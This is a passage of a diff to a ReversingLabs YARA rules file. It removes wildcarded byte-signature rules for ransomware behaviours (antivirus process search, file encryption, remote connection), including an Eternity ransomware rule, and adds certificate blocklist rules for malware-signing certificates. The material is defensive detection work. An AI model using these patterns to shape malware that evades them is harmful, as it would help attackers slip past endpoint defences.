-            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B E5 5D C3
-        }
-		$set_url_parameters_v5_0_3 = {
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
-            ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
-            75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D
-            45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
-            6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B E5 5D C3
-        }
-		$search_antivirus_processes_v5_0_2 = {
-            55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? BB ?? ?? ?? ?? 57 6A ?? 53 68 ?? ?? ?? ??
-            33 C0 50 FF D6 8B 7D ?? 6A ?? 53 6A ?? 33 DB 89 07 53 C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? FF D6 8B F0 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 6A ?? C7 06 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? EB
-            ?? 56 33 C9 89 5D ?? 50 89 5D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            83 7D ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 8D 4E ?? 89 45 ?? 51 FF 74 85 ?? FF 15 ?? ?? ??
-            ?? 85 C0 74 ?? 8B 45 ?? 8D 4E ?? 40 89 45 ?? 83 F8 ?? 72 ?? EB ?? 33 C0 39 45 ?? 8D
-            58 ?? 8D 46 ?? 50 FF 37 75 ?? FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 37 FF 15 ?? ?? ?? ?? FF 45 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 8D
-            0C 41 8B 45 ?? 81 F9 ?? ?? ?? ?? 89 4D ?? 59 0F 47 C1 89 45 ?? 56 FF 75 ?? FF 15 ??
-            ?? ?? ?? 85 C0 74 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 85 DB 74 ?? 8B 07
-            33 C9 66 39 08 74 ?? 50 FF 15 ?? ?? ?? ?? 8B 0F 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D
-            ?? 89 08 68 ?? ?? ?? ?? 33 C0 50 56 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF 15 ?? ?? ??
-            ?? 85 DB 75 ?? 68 ?? ?? ?? ?? 33 C0 50 FF 37 FF D6 8B C3 5F 5E 5B 8B E5 5D C2
-        }
-		$find_files_v5_0_2 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39
-            7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9
-            ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ??
-            89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 57 57 8D 44 24 ?? 50
-            6A ?? 56 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 75 ?? 8D 44 24 ?? 50 56 FF 15 ?? ??
-            ?? ?? 89 44 24 ?? 8B 4C 24 ?? 33 D2 66 89 11 83 F8 ?? 75 ?? BF ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D
-            44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? F6 44
-            24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ??
-            ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ??
-            ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE E8 ?? ?? ?? ?? 59 8B
-            44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ??
-            ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B
-            8B E5 5D C3
-        }
-		$crypt_files_v5_0_2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B D9 89 55 ?? 33 FF 89 5D ?? 21 7D ?? B9 ?? ??
-            ?? ?? 89 7D ?? E8 ?? ?? ?? ?? 8B F0 33 C0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 50 68 ??
-            ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 75 ?? 33 C0
-            50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB
-            ?? 0F 84 ?? ?? ?? ?? 8B 7D ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 50 68
-            ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ??
-            81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ??
-            ?? 53 FF 15 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 6A ?? 6A ?? 0F 57
-            C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? 83 65 ?? ?? 8D 55
-            ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? 58 C6 45 ?? ?? 48 75 ?? 51 68
-            ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ??
-            ?? ?? 83 65 ?? ?? 83 65 ?? ?? 41 89 45 ?? 8B 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 8E ??
-            ?? ?? ?? 83 C1 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 33 FF 6A ?? 8D 45 ?? 50 FF B6 ??
-            ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84
-            ?? ?? ?? ?? 3B 86 ?? ?? ?? ?? 8B 55 ?? 6A ?? 59 0F 42 F9 83 7D ?? ?? 8D 8D ?? ?? ??
-            ?? 0F 45 7D ?? 01 86 ?? ?? ?? ?? 89 7D ?? 83 96 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 75 ??
-            89 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 6A ?? 52 50 53 FF 15 ??
-            ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75
-            ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 53 FF 15 ?? ?? ?? ?? 85
-            C0 74 ?? 8B 75 ?? 8B 7D ?? 33 C0 40 01 86 ?? ?? ?? ?? 83 96 ?? ?? ?? ?? ?? EB ?? 33
-            C0 8D 78 ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 0F 57 C0 66 0F 13
-            45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53
-            FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B
-            CE E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ??
-            FF 75 ?? 83 65 ?? ?? 83 65 ?? ?? 8B 35 ?? ?? ?? ?? FF D6 8D 0C 45 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? FF 75 ?? 8B F8 33 C0 40 83 67 ?? ?? 88 07 FF D6 FF 75 ?? 03 C0 89 47 ?? FF
-            D6 8D 04 45 ?? ?? ?? ?? 50 FF 75 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 75
-            ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 57 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01
-            8B CF E8 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? FF 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 ?? ??
-            ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
-        }
-		$remote_connection_v5_0_2 = {
-            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3
-            8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ??
-            ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
-            83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68
-            ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF
-            75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 33 C9 41 85 C0 8B 45 ?? 0F 45
-            F9 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C2
-        }
-		$crypt_files_v5_0_3 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B F9 89 55 ?? 33 DB B9 ?? ?? ?? ?? 89 5D ?? E8
-            ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 6A ??
-            53 53 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 6A ?? 53
-            6A ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 8D 45 ?? 50 68 ?? ?? ?? ??
-            56 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 81 BE ?? ??
-            ?? ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? FF 70 ?? FF 70 ?? 53 53 57 FF 15 ?? ?? ?? ?? 57 FF
-            15 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 53 53 0F 57 C0 66 0F 13 45 ?? FF
-            75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 89 5D ?? 56 8D 4D ?? E8 ?? ??
-            ?? ?? 59 59 85 C0 74 ?? 6A ?? 58 88 5D ?? 48 75 ?? 51 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 41
-            8B 45 ?? 89 85 ?? ?? ?? ?? 89 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 8B 8E ?? ?? ?? ?? 83 C1
-            ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 89 5D ?? 53 8D 45 ?? 50 FF B6 ?? ?? ?? ?? FF 75
-            ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 85 C9 0F 84 ?? ?? ?? ?? 3B
-            8E ?? ?? ?? ?? 8B 45 ?? 6A ?? 5A 0F 42 C2 39 5D ?? 8B 55 ?? 0F 45 45 ?? 01 8E ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? 89 45 ?? 11 9E ?? ?? ?? ?? 8B 45 ?? 8B 75 ?? 50 56 89 45 ??
-            E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 53 52 50 57 FF 15 ?? ?? ?? ?? 8B
-            C3 89 5D ?? 83 F8 ?? 7D ?? 53 8D 45 ?? 50 FF 75 ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75
-            ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 40 89 45 ?? EB ?? 8B 75 ?? 33 C0 8B 4D ?? 40 01
-            86 ?? ?? ?? ?? 11 9E ?? ?? ?? ?? EB ?? 33 C0 8D 48 ?? 89 4D ?? 85 C9 0F 84 ?? ?? ??
-            ?? 39 5D ?? 74 ?? 6A ?? 53 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 57 FF 15 ?? ??
-            ?? ?? 53 8D 45 ?? 50 68 ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B D8 E8 ?? ??
-            ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 FF ?? 74 ?? 8B 45 ?? 57 83 08
-            ?? FF 15 ?? ?? ?? ?? 8B C3 5F 5E 5B 8B E5 5D C3
-        }
-		$remote_connection_v5_0_3 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 68 ?? ?? ?? ?? 33 DB 8D 85 ?? ?? ?? ?? 8B F1 53
-            50 89 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B FB 0F B7 04 5E 66 85 C0 74 ?? 83 F8 ?? 75 ??
-            83 C3 ?? 56 89 5D ?? FF 15 ?? ?? ?? ?? 3B D8 73 ?? 8D 14 1B 0F B7 04 32 EB ?? 66 83
-            F8 ?? 74 ?? 43 0F B7 04 5E 66 85 C0 75 ?? EB ?? 8B CB 2B 4D ?? 74 ?? 03 F2 8D BD ??
-            ?? ?? ?? D1 E9 F3 A5 13 C9 66 F3 A5 8B 75 ?? 8D 43 ?? 8D 04 46 50 8D 85 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 33 FF 47 43 85 FF 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ??
-            ?? 8D 7D ?? 6A ?? 59 BE ?? ?? ?? ?? F3 A5 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85
-            FF 74 ?? 51 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 83 EC ?? 57 FF 15 ?? ?? ??
-            ?? 50 57 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B CF 8B
-            F0 E8 ?? ?? ?? ?? EB ?? 33 F6 83 7D ?? ?? 74 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 8B C6
-            5E 5B 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BELLAP LIMITED" and pe.signatures [ i ] . serial == "69:8f:f3:88:ad:b5:0b:88:af:b8:32:e7:6b:0a:0a:d1" and 1675070541 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_391Ae38670Ab188A5De26E07 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "aca9ac98-1c3b-5231-b6e5-97e3b8fec6de"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16138-L16154"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f7ccfadab650ae3b6f950c9d1b35f86aa4a4e6c05479c014ab18881a405678f0"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $search_antivirus_processes and $find_files and $crypt_files and $remote_connection ) or ( $find_files_v2 and $crypt_files_v2 and $search_antivirus_processes_v2 and $remote_connection_v2 ) or ( $search_antivirus_processes_v2 and $find_files_v2_1 and $crypt_files_v2_1 and $remote_connection_v2_1 ) or ( $search_antivirus_processes_v4_1_2 and $find_files_v4_1_2 and $crypt_files_v4_1_2 and $remote_connection_v4_1_2 and $url_parameters_setup_v4_1_2 ) or ( $search_antivirus_processes_v4 and $find_files_v4 and $crypt_files_v4 and $url_parameters_setup_v4 ) or ( $search_antivirus_processes_v2 and $find_files_v2_1 and $remote_connection_v2_1 and $crypt_files_v3 ) or ( $search_antivirus_processes_v5 and $find_files_v5 and $crypt_files_v5 and $remote_connection_v5 and $url_parameters_setup_v5 ) or ( $search_antivirus_processes_v5_0_1 and $find_files_v5_0_1 and $crypt_files_v5_0_1 and $url_parameters_setup_v5_0_1 and $remote_connection_v5_0_1 ) or ( $search_antivirus_processes_v5_0_2 and $find_files_v5_0_2 and $crypt_files_v5_0_2 and $set_url_parameters_v5_0_2 and $remote_connection_v5_0_2 ) or ( $search_antivirus_processes_v5_0_2 and $find_files_v5_0_2 and $crypt_files_v5_0_3 and $set_url_parameters_v5_0_3 and $remote_connection_v5_0_3 ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DVERI FADO, TOV" and pe.signatures [ i ] . serial == "39:1a:e3:86:70:ab:18:8a:5d:e2:6e:07" and 1540832872 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Eternity : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_D08D83Ff118Df3777E371C5C482Cce7B : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Eternity ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7bb0f3b0-a8c0-5239-a1b4-532d403f59bc"
-		date = "2022-07-22"
-		modified = "2022-07-22"
+		id = "5acd2e61-1c04-5cc5-8773-25856fc163c4"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.Eternity.yara#L1-L74"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a2298a26e9bbe2b779eb2afeeda28d4321bc2d26db46bbb377bf86abaf8fa929"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16156-L16174"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5fdaf01c6a23057ab976e3ad2a8b40558b16693161410b0f30d7b884de7e3985"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Eternity"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ??
-            ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 0C 2B ?? 08
-            6F ?? ?? ?? ?? 0D 09 03 04 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 2C ?? 08 6F
-            ?? ?? ?? ?? DC 02 28 ?? ?? ?? ?? 0B 07 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13
-            ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ??
-            11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11
-            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ??
-            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 03 04 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 17 58
-            13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A
-        }
-		$encrypt_files = {
-            28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 0A 02
-            28 ?? ?? ?? ?? 0B 07 06 28 ?? ?? ?? ?? 0C 02 19 28 ?? ?? ?? ?? 0D 09 16 6A 6F ?? ?? ??
-            ?? 09 6F ?? ?? ?? ?? 02 1C 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 2C ?? 28 ?? ?? ??
-            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ??
-            08 16 08 8E 69 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 58 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 02 6F
-            ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 2A
-        }
-		$aes_encrypt = {
-            14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 73 ?? ??
-            ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ??
-            ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ??
-            ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11
-            ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ??
-            09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 06 2A
-        }
-		$encrypt_pass = {
-            72 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 0B D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C
-            08 07 6F ?? ?? ?? ?? A5 ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 09 6F ?? ?? ?? ?? 7E
-            ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ??
-            16 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $aes_encrypt ) and ( $encrypt_pass )
